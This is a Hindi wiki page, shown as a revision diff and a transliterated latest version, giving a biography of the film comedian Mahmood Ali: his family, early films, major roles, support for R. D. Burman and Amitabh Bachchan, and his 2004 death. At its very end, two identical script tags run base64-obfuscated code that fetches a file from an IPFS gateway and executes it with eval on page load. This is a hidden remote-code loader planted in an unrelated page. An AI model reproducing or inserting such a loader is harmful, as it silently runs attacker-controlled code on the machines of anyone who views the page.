Difference between revisions of "महमूद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "हिंदी" to "हिन्दी")
 
(14 intermediate revisions by 4 users not shown)
Line 5: Line 5:
 
|प्रसिद्ध नाम=महमूद
 
|प्रसिद्ध नाम=महमूद
 
|अन्य नाम=
 
|अन्य नाम=
|जन्म=[[29 सितंबर]] 1932
+
|जन्म=[[29 सितंबर]], [[1932]]
 
|जन्म भूमि=[[मुम्बई]], [[भारत]]
 
|जन्म भूमि=[[मुम्बई]], [[भारत]]
|मृत्यु=[[23 जुलाई]] 2004
+
|मृत्यु=[[23 जुलाई]], [[2004]]
|मृत्यु स्थान=अमेरिका
+
|मृत्यु स्थान=[[अमेरिका]]
|अविभावक=पिता- मुमताज अली
+
|अभिभावक=[[पिता]]- मुमताज़ अली
 
|पति/पत्नी=मधु अली
 
|पति/पत्नी=मधु अली
 
|संतान=
 
|संतान=
 
|कर्म भूमि=मुम्बई
 
|कर्म भूमि=मुम्बई
|कर्म-क्षेत्र=सिनेमा
+
|कर्म-क्षेत्र=[[अभिनेता]]
 
|मुख्य रचनाएँ=
 
|मुख्य रचनाएँ=
|मुख्य फ़िल्में=प्यार किए जा, पड़ोसन, कुँवारा बाप
+
|मुख्य फ़िल्में='प्यार किए जा', 'पड़ोसन', 'कुँवारा बाप' आदि।
 
|विषय=
 
|विषय=
 
|शिक्षा=
 
|शिक्षा=
 
|विद्यालय=
 
|विद्यालय=
|पुरस्कार-उपाधि=फ़िल्मफेयर पुरस्कार (4) सर्वश्रेष्ठ हास्य अभिनेता 
+
|पुरस्कार-उपाधि=फ़िल्मफेयर पुरस्कार सर्वश्रेष्ठ हास्य अभिनेता (4 बार)  
 
|प्रसिद्धि=
 
|प्रसिद्धि=
 
|विशेष योगदान=
 
|विशेष योगदान=
Line 28: Line 28:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=
+
|अन्य जानकारी=तीन दशक लम्बे चले उनके कैरियर में इन्होंने 300 से ज़्यादा हिन्दी फ़िल्मों में काम किया।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''महमूद''' अथवा '''महमूद अली''' (अंग्रेज़ी: ''Mahmood'' अथवा ''Mehmood Ali'') (जन्म- [[29 सितंबर]] 1932, [[मुम्बई]] [[भारत]]; मृत्यु- [[23 जुलाई]] 2004, [[अमेरिका]]) फ़िल्म जगत के प्रसिद्ध हास्य अभिनेता हैं। इनका पूरा नाम महमूद अली है। तीन दशक लम्बे चले उनके करीयर में उन्होंने 300 से ज़्यादा हिन्दी फ़िल्मों में काम किया।
+
'''महमूद''' ([[अंग्रेज़ी]]: ''Mahmood'', जन्म- [[29 सितंबर]], [[1932]], [[मुम्बई]]; मृत्यु- [[23 जुलाई]], [[2004]], [[अमेरिका]]) फ़िल्म जगत् के प्रसिद्ध हास्य अभिनेता थे। उनका पूरा नाम महमूद अली था। तीन दशक लम्बे चले उनके कैरियर में उन्होंने 300 से ज़्यादा हिन्दी फ़िल्मों में काम किया। अपने बहुरंगीय किरदारों से दर्शकों को हँसाने और गंभीर भूमिका कर रुलाने वाले महमूद अभिनय के प्रति समर्पित थे। अपने बहुमुखी अभिनय और कला के प्रति समर्पण ने उन्हें बुलंदियाँ दी और उनको फ़िल्मफ़ेयर सहित कई पुरस्कारों का सम्मान मिला। उन्होंने कई फ़िल्मों में गीत ही नहीं गाये बल्कि फ़िल्मों का निर्माण और निर्देशन भी किया।
 
==जन्म और परिवार==
 
==जन्म और परिवार==
महमूद का जन्म 29 सितंबर 1932, मुम्बई भारत में हुआ था। महमूद मशहूर नृतक मुमताज अली के बेटे और चरित्र अभिनेत्री मिन्नो मुमताज अली के भाई थे। महमूद ने अभिनेत्री [[मीना कुमारी]] की बहन मधु से शादी की थी। आठ संतानों के पिता महमूद के दूसरे बेटे मक़सूद लकी अली जाने-माने गायक और अभिनेता हैं। निर्देशक के रूप में महमूद की अंतिम फ़िल्म थी दुश्मन दुनिया का। 1996 में बनी इस फ़िल्म में उन्होंने अपने बेटे मंज़ूर अली को पर्दे पर उतारा था।<ref>{{cite web |url=http://www.bbc.co.uk/hindi/entertainment/story/2004/07/040723_mehmud_death.shtml |title=सबको हँसाने वाले महमूद नहीं रहे |accessmonthday=[[11 जुलाई]] |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=bbchindi.com |language=हिन्दी }}</ref>
+
महमूद का जन्म 29 सितंबर, 1932, मुम्बई, [[भारत]] में हुआ था। महमूद मशहूर नृतक मुमताज़ अली के बेटे और चरित्र अभिनेत्री मिन्नो मुमताज़ अली के भाई थे। महमूद ने अभिनेत्री [[मीना कुमारी]] की बहन मधु से [[विवाह]] किया था। आठ संतानों के पिता महमूद के दूसरे बेटे मक़सूद लकी अली जाने-माने गायक और अभिनेता हैं। निर्देशक के रूप में महमूद की अंतिम फ़िल्म थी 'दुश्मन दुनिया का'। [[1996]] में बनी इस फ़िल्म में उन्होंने अपने बेटे मंज़ूर अली को पर्दे पर उतारा था।<ref>{{cite web |url=http://www.bbc.co.uk/hindi/entertainment/story/2004/07/040723_mehmud_death.shtml |title=सबको हँसाने वाले महमूद नहीं रहे |accessmonthday=[[11 जुलाई]] |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=bbchindi.com |language=हिन्दी }}</ref>
 
+
[[चित्र:Mahmood-3.jpg|250px|thumb|left|महमूद]]
 
==पहली फ़िल्म==
 
==पहली फ़िल्म==
महमूद पहला ब्रेक 1958 की फ़िल्म परवरिश में मिला था, जिसमें उन्होंने [[राज कपूर]] के भाई की भूमिका निभाई थी। 1961 की "ससुराल" उनके कैरियर की अहम फ़िल्म थी जिसके जरिए बतौर हास्य कलाकार स्थापित होने में उन्हें मदद मिली। 60 के दशक के हास्य कलाकारों की टीम की सफल शुरुआत के लिए भी "ससुराल" को अहम माना जाता है क्योंकि इस फ़िल्म में महमूद के साथ-साथ शुभा खोटे जैसी हास्य अभिनेत्री ने भी अपनी कला के जौहर दिखाए।
+
महमूद को पहला ब्रेक [[1958]] की फ़िल्म 'परवरिश' में मिला था, जिसमें उन्होंने [[राज कपूर]] के भाई की भूमिका निभाई थी। [[1961]] की "ससुराल" उनके कैरियर की अहम फ़िल्म थी, जिसके जरिए बतौर हास्य कलाकार स्थापित होने में उन्हें मदद मिली। 60 के दशक के हास्य कलाकारों की टीम की सफल शुरुआत के लिए भी "ससुराल" को अहम माना जाता है, क्योंकि इस फ़िल्म में महमूद के साथ-साथ शुभा खोटे जैसी हास्य अभिनेत्री ने भी अपनी कला के जौहर दिखाए।
 
==प्रमुख भूमिका==
 
==प्रमुख भूमिका==
1965 की फ़िल्म "जौहर महमूद इन गोवा" में उन्हें कॉमेडियन के साथ-साथ प्रमुख भूमिका निभाने का भी मौका मिला। "प्यार किए जा" (1966) और "पड़ोसन" (1968) महमूद की दो सर्वाधिक यादगार भूमिकाओं वाली फ़िल्में हैं। "प्यार किए जा" में महमूद ने एक ऐसे युवक का किरदार निभाया जो फ़िल्म निर्देशक बनना चाहता है और अपने बैनर 'वाह वाह प्रोडक्शन' के लिए वह अपने पिता (ओम प्रकाश) से आर्थिक मदद की उम्मीद रखता है। वहीं "पड़ोसन" में दक्षिण भारतीय गायक के किरदार में भी महमूद ने दर्शकों को खूब लुभाया।<ref>{{cite web |url=http://navbharattimes.indiatimes.com/articleshow/789017.cms |title=महमूद |accessmonthday=[[11 जुलाई]] |accessyear=2011 |last= |first= |authorlink= |format=सी.एम.एस. |publisher=नवभारत टाइम्स |language=हिन्दी }}</ref>
+
[[1965]] की फ़िल्म "जौहर महमूद इन गोवा" में उन्हें कॉमेडियन के साथ-साथ प्रमुख भूमिका निभाने का भी मौक़ा मिला। "प्यार किए जा" ([[1966]]) और "पड़ोसन" ([[1968]]) महमूद की दो सर्वाधिक यादगार भूमिकाओं वाली फ़िल्में हैं। "प्यार किए जा" में महमूद ने एक ऐसे युवक का किरदार निभाया, जो फ़िल्म निर्देशक बनना चाहता है और अपने बैनर 'वाह वाह प्रोडक्शन' के लिए वह अपने पिता ([[ओम प्रकाश]]) से आर्थिक मदद की उम्मीद रखता है। वहीं "पड़ोसन" में दक्षिण भारतीय गायक के किरदार में भी महमूद ने दर्शकों को खूब लुभाया।<ref>{{cite web |url=http://navbharattimes.indiatimes.com/articleshow/789017.cms |title=महमूद |accessmonthday=[[11 जुलाई]] |accessyear=2011 |last= |first= |authorlink= |format=सी.एम.एस. |publisher=नवभारत टाइम्स |language=हिन्दी }}</ref>
 
 
[[चित्र:Mahmood-3.jpg|250px|thumb|left|महमूद]]
 
 
==प्रतिभाशाली व्यक्तित्व==
 
==प्रतिभाशाली व्यक्तित्व==
अपनी बहुरंगीय किरदारो से दर्शकों को हँसाने और गंभीर भूमिका रूलाने वाले महमूद अभिनय के प्रति समर्पित थे। अपने बहुमुखी अभिनय और कला के प्रति समर्पण ने उन्हें बुलंदियाँ दी और उनको फ़िल्मफ़ेयर सहित कई पुरस्कारों का सम्मान मिला। उन्होंने कई फ़िल्मों में गीत ही नहीं गाये बल्कि फ़िल्मों का निर्माण और निर्देशन भी किया। जिसमें "छोटे नवाब", "भूतबंगला", "पड़ोसन", "बांबे टू गोवा", "दुश्मन दुनिया का", "सबसे बड़ा रुपैया" आदि शामिल है। जबकि विकलांगो पर बनी फ़िल्म "कुँवारा बाप" में किया गया उनका अभिनय आज भी उनकी यादों को ताजा करता है।<ref>{{cite web |url=http://www.keepintouchnews.com/detailsnews.php?id=2640 |title=महमूद तो महमूद ही थे |accessmonthday=[[11 जुलाई]] |accessyear=2011 |last= |first= |authorlink= |format=पी.एच.पी. |publisher=keepintouchnews.com |language=हिन्दी }}</ref>
+
अपनी बहुरंगीय किरदारों से दर्शकों को हँसाने और गंभीर भूमिका कर रूलाने वाले महमूद अभिनय के प्रति समर्पित थे। अपने बहुमुखी अभिनय और कला के प्रति समर्पण ने उन्हें बुलंदियाँ दी और उनको फ़िल्मफ़ेयर सहित कई पुरस्कारों का सम्मान मिला। उन्होंने कई फ़िल्मों में गीत ही नहीं गाये बल्कि फ़िल्मों का निर्माण और निर्देशन भी किया। जिसमें "छोटे नवाब", "भूतबंगला", "पड़ोसन", "बांबे टू गोवा", "दुश्मन दुनिया का", "सबसे बड़ा रुपैया" आदि शामिल है। जबकि विकलांगों पर बनी फ़िल्म "कुँवारा बाप" में किया गया उनका अभिनय आज भी उनकी यादों को ताजा करता है।<ref>{{cite web |url=http://www.keepintouchnews.com/detailsnews.php?id=2640 |title=महमूद तो महमूद ही थे |accessmonthday=[[11 जुलाई]] |accessyear=2011 |last= |first= |authorlink= |format=पी.एच.पी. |publisher=keepintouchnews.com |language=हिन्दी }}</ref>
 
+
महमूद के व्यक्तित्व में तमाम रंग थे। इनमें से एक था, नए लोगों को मौक़ा देना। उन्होंने 'छोटे नवाब' फ़िल्म में संगीतकार [[राहुल देव बर्मन]] को पहली बार मौक़ा देकर फ़िल्म उद्योग को एक बेहतरीन तोहफा दिया था। इसी प्रकार महमूद ने सुपर स्टार [[अमिताभ बच्चन]] की उस समय मदद की थी, जब वह संघर्ष के दौर से गुजर रहे थे। उनके कैरियर को बल देने के लिए महमूद ने 'बांबे टु गोवा' फ़िल्म बनाई थी।<ref>{{cite web |url=http://in.jagran.yahoo.com/news/national/general/5_1_4859884/ |title=हास्य के पर्याय थे महमूद  |accessmonthday=[[11 जुलाई]] |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=जागरण याहू |language=हिन्दी }}</ref>
महमूद के व्यक्तित्व में तमाम रंग थे। इनमें से एक था, नए लोगों को मौका देना। उन्होंने "छोटे नवाब फ़िल्म" में संगीतकार [[राहुल देव बर्मन]] को पहली बार मौका देकर फ़िल्म उद्योग को एक बेहतरीन तोहफा दिया था। इसी प्रकार महमूद ने सुपर स्टार [[अमिताभ बच्चन]] की उस समय मदद की थी, जब वह संघर्ष के दौर से गुजर रहे थे। उनके कैरियर को बल देने के लिए महमूद ने बांबे टु गोवा फ़िल्म बनाई थी।<ref>{{cite web |url=http://in.jagran.yahoo.com/news/national/general/5_1_4859884/ |title=हास्य के पर्याय थे महमूद  |accessmonthday=[[11 जुलाई]] |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=जागरण याहू |language=हिन्दी }}</ref>
 
  
 
==निधन==
 
==निधन==
अपने जीवन के आख़िरी दिनों में महमूद का स्वास्थ्य खराब हो गया। वह इलाज के लिए अमेरिका गए जहाँ [[23 जुलाई]] 2004 को उनका निधन हो गया। दुनिया को हंसाकर लोट-पोट करने वाला यह महान कलाकार नींद के आगोश में बड़ी खामोशी से इस दुनिया से विदा हो गया।
+
अपने जीवन के आख़िरी दिनों में महमूद का स्वास्थ्य ख़राब हो गया। वह इलाज के लिए [[अमेरिका]] गए, जहाँ [[23 जुलाई]], [[2004]] को उनका निधन हो गया। दुनिया को हंसाकर लोट-पोट करने वाला यह महान् कलाकार नींद के आगोश में बड़ी खामोशी से इस दुनिया से विदा हो गया।
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
*[http://in.jagran.yahoo.com/cinemaaza/cinema/memories/201_201_8246.html कॉमेडी को नए मायने दिए महमूद ने]
+
*[http://www.youtube.com/show/100yearsofbollywood?annotation_id=annotation_617606&feature=iv&src_vid=Z_Ak_IrcoJE द किंग ऑफ़ कॉमेडी महमूद (यू-ट्यूब)]
 +
*[https://www.youtube.com/watch?v=bmfDGoV0-14 महमूद के बॉलीवुड सफ़र पर एक वीडियो देखें (यू-ट्यूब)]
 +
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{अभिनेता}}
+
{{फ़िल्म निर्माता और निर्देशक}}{{अभिनेता}}
 
[[Category:हास्य अभिनेता]]  
 
[[Category:हास्य अभिनेता]]  
 
[[Category:अभिनेता]]  
 
[[Category:अभिनेता]]  
[[Category:प्रसिद्ध व्यक्तित्व]]
 
 
[[Category:सिनेमा कोश]]  
 
[[Category:सिनेमा कोश]]  
 
[[Category:कला कोश]]  
 
[[Category:कला कोश]]  
[[Category:प्रसिद्ध व्यक्तित्व कोश]]
 
 
[[Category:चरित कोश]]
 
[[Category:चरित कोश]]
 
[[Category:फ़िल्म निर्देशक]]
 
[[Category:फ़िल्म निर्देशक]]

Latest revision as of 05:30, 29 September 2017

mahamood
poora nam mahamood ali
prasiddh nam mahamood
janm 29 sitanbar, 1932
janm bhoomi mumbee, bharat
mrityu 23 julaee, 2004
mrityu sthan amerika
abhibhavak pita- mumataz ali
pati/patni madhu ali
karm bhoomi mumbee
karm-kshetr abhineta
mukhy filmean 'pyar kie ja', 'p dosan', 'kuanvara bap' adi.
puraskar-upadhi filmapheyar puraskar sarvashreshth hasy abhineta (4 bar)
nagarikata bharatiy
any janakari tin dashak lambe chale unake kairiyar mean inhoanne 300 se zyada hindi filmoan mean kam kiya.

mahamood (aangrezi: Mahmood, janm- 29 sitanbar, 1932, mumbee; mrityu- 23 julaee, 2004, amerika) film jagath ke prasiddh hasy abhineta the. unaka poora nam mahamood ali tha. tin dashak lambe chale unake kairiyar mean unhoanne 300 se zyada hindi filmoan mean kam kiya. apane bahurangiy kiradaroan se darshakoan ko hansane aur ganbhir bhoomika kar rulane vale mahamood abhinay ke prati samarpit the. apane bahumukhi abhinay aur kala ke prati samarpan ne unhean bulandiyaan di aur unako filmafeyar sahit kee puraskaroan ka samman mila. unhoanne kee filmoan mean git hi nahian gaye balki filmoan ka nirman aur nirdeshan bhi kiya.

janm aur parivar

mahamood ka janm 29 sitanbar, 1932, mumbee, bharat mean hua tha. mahamood mashahoor nritak mumataz ali ke bete aur charitr abhinetri minno mumataz ali ke bhaee the. mahamood ne abhinetri mina kumari ki bahan madhu se vivah kiya tha. ath santanoan ke pita mahamood ke doosare bete maqasood laki ali jane-mane gayak aur abhineta haian. nirdeshak ke roop mean mahamood ki aantim film thi 'dushman duniya ka'. 1996 mean bani is film mean unhoanne apane bete manzoor ali ko parde par utara tha.[1] 250px|thumb|left|mahamood

pahali film

mahamood ko pahala brek 1958 ki film 'paravarish' mean mila tha, jisamean unhoanne raj kapoor ke bhaee ki bhoomika nibhaee thi. 1961 ki "sasural" unake kairiyar ki aham film thi, jisake jarie bataur hasy kalakar sthapit hone mean unhean madad mili. 60 ke dashak ke hasy kalakaroan ki tim ki saphal shuruat ke lie bhi "sasural" ko aham mana jata hai, kyoanki is film mean mahamood ke sath-sath shubha khote jaisi hasy abhinetri ne bhi apani kala ke jauhar dikhae.

pramukh bhoomika

1965 ki film "jauhar mahamood in gova" mean unhean k aaumediyan ke sath-sath pramukh bhoomika nibhane ka bhi mauqa mila. "pyar kie ja" (1966) aur "p dosan" (1968) mahamood ki do sarvadhik yadagar bhoomikaoan vali filmean haian. "pyar kie ja" mean mahamood ne ek aise yuvak ka kiradar nibhaya, jo film nirdeshak banana chahata hai aur apane bainar 'vah vah prodakshan' ke lie vah apane pita (om prakash) se arthik madad ki ummid rakhata hai. vahian "p dosan" mean dakshin bharatiy gayak ke kiradar mean bhi mahamood ne darshakoan ko khoob lubhaya.[2]

pratibhashali vyaktitv

apani bahurangiy kiradaroan se darshakoan ko hansane aur ganbhir bhoomika kar roolane vale mahamood abhinay ke prati samarpit the. apane bahumukhi abhinay aur kala ke prati samarpan ne unhean bulandiyaan di aur unako filmafeyar sahit kee puraskaroan ka samman mila. unhoanne kee filmoan mean git hi nahian gaye balki filmoan ka nirman aur nirdeshan bhi kiya. jisamean "chhote navab", "bhootabangala", "p dosan", "baanbe too gova", "dushman duniya ka", "sabase b da rupaiya" adi shamil hai. jabaki vikalaangoan par bani film "kuanvara bap" mean kiya gaya unaka abhinay aj bhi unaki yadoan ko taja karata hai.[3] mahamood ke vyaktitv mean tamam rang the. inamean se ek tha, ne logoan ko mauqa dena. unhoanne 'chhote navab' film mean sangitakar rahul dev barman ko pahali bar mauqa dekar film udyog ko ek behatarin tohapha diya tha. isi prakar mahamood ne supar star amitabh bachchan ki us samay madad ki thi, jab vah sangharsh ke daur se gujar rahe the. unake kairiyar ko bal dene ke lie mahamood ne 'baanbe tu gova' film banaee thi.[4]

nidhan

apane jivan ke akhiri dinoan mean mahamood ka svasthy kharab ho gaya. vah ilaj ke lie amerika ge, jahaan 23 julaee, 2004 ko unaka nidhan ho gaya. duniya ko hansakar lot-pot karane vala yah mahanh kalakar niand ke agosh mean b di khamoshi se is duniya se vida ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. sabako hansane vale mahamood nahian rahe (hindi) (ech.ti.em.el) bbchindi.com. abhigaman tithi: 11 julaee, 2011.
  2. mahamood (hindi) (si.em.es.) navabharat taims. abhigaman tithi: 11 julaee, 2011.
  3. mahamood to mahamood hi the (hindi) (pi.ech.pi.) keepintouchnews.com. abhigaman tithi: 11 julaee, 2011.
  4. hasy ke paryay the mahamood (hindi) (ech.ti.em.el) jagaran yahoo. abhigaman tithi: 11 julaee, 2011.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>